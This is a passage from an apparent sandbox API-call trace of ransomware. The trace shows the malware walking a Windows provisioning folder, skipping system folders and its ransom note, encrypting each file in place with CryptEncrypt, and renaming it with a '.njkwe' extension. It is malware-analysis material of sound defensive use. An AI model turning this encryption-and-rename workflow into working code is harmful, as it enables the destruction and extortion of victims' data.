(lpString1="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.813] lstrcmpiW (lpString1="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.813] lstrcmpiW (lpString1="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.813] lstrcmpiW (lpString1="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.813] lstrcmpiW (lpString1="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.813] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml") returned 163 [0078.813] StrStrIW (lpFirst="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.813] lstrcmpW (lpString1="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.813] lstrcmpW (lpString1="386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.813] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\386__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.813] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\386__connections_cellular_singtel (singapore)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.813] GetTickCount () returned 0x1154080 [0078.813] GetTickCount () returned 0x1154080 [0078.813] GetTickCount () returned 0x1154080 [0078.813] GetTickCount () returned 0x1154080 [0078.813] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.813] GetProcessHeap () returned 0xbe0000 [0078.813] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.814] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0078.818] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.818] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0078.819] GetProcessHeap () returned 0xbe0000 [0078.819] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.819] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.819] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.819] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.819] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.819] CloseHandle (hObject=0x43c) returned 1 [0078.819] GetProcessHeap () returned 0xbe0000 [0078.819] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.819] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\386__connections_cellular_singtel (singapore)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\386__Connections_Cellular_Singtel (Singapore)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\386__connections_cellular_singtel (singapore)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.820] GetProcessHeap () returned 0xbe0000 [0078.820] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.820] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e0de39, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e0de39, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e0de39, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", cAlternateFileName="387__C~1.PRO")) returned 1 [0078.820] lstrcmpiW (lpString1="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.820] lstrcmpiW (lpString1="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.820] lstrcmpiW (lpString1="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.820] lstrcmpiW (lpString1="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.820] lstrcmpiW (lpString1="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.820] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml") returned 163 [0078.820] StrStrIW (lpFirst="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.820] lstrcmpW (lpString1="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.820] lstrcmpW (lpString1="387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.820] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\387__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.820] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\387__connections_cellular_singtel (singapore)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.821] GetTickCount () returned 0x1154080 [0078.821] GetTickCount () returned 0x1154080 [0078.821] GetTickCount () returned 0x1154080 [0078.821] GetTickCount () returned 0x1154080 [0078.821] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.821] GetProcessHeap () returned 0xbe0000 [0078.821] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.821] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0078.824] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.824] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2ca, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2ca, lpOverlapped=0x0) returned 1 [0078.824] GetProcessHeap () returned 0xbe0000 [0078.824] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.824] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.824] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.825] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.839] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.840] CloseHandle (hObject=0x43c) returned 1 [0078.840] GetProcessHeap () returned 0xbe0000 [0078.840] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.840] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\387__connections_cellular_singtel (singapore)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\387__Connections_Cellular_Singtel (Singapore)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\387__connections_cellular_singtel (singapore)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.854] GetProcessHeap () returned 0xbe0000 [0078.854] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.854] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e340a5, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e340a5, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e340a5, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", cAlternateFileName="388__C~1.PRO")) returned 1 [0078.854] lstrcmpiW (lpString1="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.854] lstrcmpiW (lpString1="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.854] lstrcmpiW (lpString1="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.854] lstrcmpiW (lpString1="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.854] lstrcmpiW (lpString1="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.854] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml") returned 163 [0078.854] StrStrIW (lpFirst="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.854] lstrcmpW (lpString1="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.854] lstrcmpW (lpString1="388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.854] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\388__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.854] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\388__connections_cellular_starhub (singapore)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.855] GetTickCount () returned 0x115409f [0078.855] GetTickCount () returned 0x115409f [0078.855] GetTickCount () returned 0x115409f [0078.855] GetTickCount () returned 0x115409f [0078.855] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.855] GetProcessHeap () returned 0xbe0000 [0078.855] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.855] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0078.857] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.857] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x34f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0078.857] GetProcessHeap () returned 0xbe0000 [0078.857] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.857] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.857] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.857] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.857] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.857] CloseHandle (hObject=0x43c) returned 1 [0078.857] GetProcessHeap () returned 0xbe0000 [0078.857] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.857] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\388__connections_cellular_starhub (singapore)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\388__Connections_Cellular_Starhub (Singapore)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\388__connections_cellular_starhub (singapore)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.858] GetProcessHeap () returned 0xbe0000 [0078.858] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.858] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e340a5, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e340a5, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e340a5, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", cAlternateFileName="389__C~1.PRO")) returned 1 [0078.858] lstrcmpiW (lpString1="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.858] lstrcmpiW (lpString1="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.858] lstrcmpiW (lpString1="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.858] lstrcmpiW (lpString1="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.858] lstrcmpiW (lpString1="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.858] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml") returned 163 [0078.858] StrStrIW (lpFirst="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.859] lstrcmpW (lpString1="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.859] lstrcmpW (lpString1="389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.859] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\389__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.859] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\389__connections_cellular_starhub (singapore)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.859] GetTickCount () returned 0x11540af [0078.859] GetTickCount () returned 0x11540af [0078.859] GetTickCount () returned 0x11540af [0078.859] GetTickCount () returned 0x11540af [0078.859] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.859] GetProcessHeap () returned 0xbe0000 [0078.859] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.859] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0078.861] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.861] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x34f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0078.861] GetProcessHeap () returned 0xbe0000 [0078.861] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.861] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.861] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.861] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.861] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.861] CloseHandle (hObject=0x43c) returned 1 [0078.862] GetProcessHeap () returned 0xbe0000 [0078.862] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.862] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\389__connections_cellular_starhub (singapore)_i1$(__mvid)@wap.provxml"), 